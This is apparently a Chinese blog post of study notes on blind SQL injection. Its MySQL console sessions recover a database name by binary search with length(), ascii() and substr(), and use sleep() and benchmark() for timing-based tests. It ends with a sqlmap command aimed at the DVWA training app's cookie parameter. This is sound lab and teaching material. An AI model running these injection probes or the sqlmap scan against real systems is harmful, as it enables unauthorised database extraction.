• sql盲注-笔记

     盲注是因为数据库查询的结果不会直接显示在页面。只能通过构造查询语句查看反馈的结果真&假状态来判断信息。
     
    实际注入手法和回显注入区别不大
    下面只记录相关思路
     
    select length('test'); 查看字符串长度
    二分法判断数据库名字的长度
    mysql> select length(database())>10;
    +-----------------------+
    | length(database())>10 |
    +-----------------------+
    |                     0 |
    +-----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>5;
    +----------------------+
    | length(database())>5 |
    +----------------------+
    |                    0 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>3;
    +----------------------+
    | length(database())>3 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())=4;
    +----------------------+
    | length(database())=4 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select substr(database(),1,1);
    +------------------------+
    | substr(database(),1,1) |
    +------------------------+
    | d                      |
    +------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>64;
    +----------------------------------+
    | ascii(substr(database(),1,1))>64 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))>100 |
    +-----------------------------------+
    |                                 0 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>80;
    +----------------------------------+
    | ascii(substr(database(),1,1))>80 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>90;
    +----------------------------------+
    | ascii(substr(database(),1,1))>90 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>95;
    +----------------------------------+
    | ascii(substr(database(),1,1))>95 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>97;
    +----------------------------------+
    | ascii(substr(database(),1,1))>97 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>98;
    +----------------------------------+
    | ascii(substr(database(),1,1))>98 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>99;
    +----------------------------------+
    | ascii(substr(database(),1,1))>99 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))=100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))=100 |
    +-----------------------------------+
    |                                 1 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    使用二分法判断出数据库第一个字母ascii码为100 对应的字母为小写d
     
    另外盲注还可以通过延时来判断
    mysql> select sleep(if(length(database())=4,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=4,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (3.00 sec)
     
    mysql> select sleep(if(length(database())=5,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=5,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select sleep(if(length(database())=5,3,0));  
    通过响应返回的延时来判断信息是否正确
     
    也可以用 benchmark重复执行命令函数来进行延时
    mysql> select benchmark(50000,md5('test'));
     
    +------------------------------+
    | benchmark(50000,md5('test')) |
    +------------------------------+
    |                            0 |
    +------------------------------+
    1 row in set (0.02 sec)
     
    mysql> select benchmark(5000000,md5('test'));
    +--------------------------------+
    | benchmark(5000000,md5('test')) |
    +--------------------------------+
    |                              0 |
    +--------------------------------+
    1 row in set (1.45 sec)
     
     
    DVWA high难度
    python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2
    查询字段在cookie内  需要设置--level 2
     
     
     
  • 相关阅读:
    html5 video标签如何禁止视频下载
    Redis源代码-数据结构Adlist双端列表
    HTML5分析实战WebSockets基本介绍
    Chromium on Android: Android在系统Chromium为了实现主消息循环分析
    Android AIDL使用特定的解释
    [LeetCode]Maximum Product Subarray
    OC省字典的数组摘要集
    CocoaChina 第四个测试
    Java在的时候,类定义HashSet初始化方法
    WSHPSRS-匹克选择列表生成器-SRS(R12.2.3)
  • 原文地址:https://www.cnblogs.com/enderzhou/p/6884537.html
Copyright © 2020-2023  润新知